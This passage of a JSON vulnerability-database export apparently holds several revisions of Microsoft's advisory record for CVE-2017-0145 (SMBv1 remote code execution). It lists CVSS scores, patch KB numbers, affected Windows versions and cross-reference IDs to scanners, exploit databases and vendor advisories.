"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T02:48:09", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-18T02:48:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB4012212", "KB4012213", "KB3210721", "KB4013198", "KBMS16-110, 3187754", "KB4012606", "KB3205409", "KB4012217", "KB3205401", "KB3212646", "KB4014077", "KB4013429", "KB4012215", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:48:09", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-18T18:44:54", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T18:44:54", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-18T18:44:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB4014077", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:54", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T00:58:24", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T00:58:24", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T00:58:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3205409", "KB4012212", "KB4012213", "KB3212646", "KB3210720", "KB3177186", "KB4012606", "KB4012214", "KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4014077", "KB4013429", "KB4012598", "KB4013198", "KB3205401", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 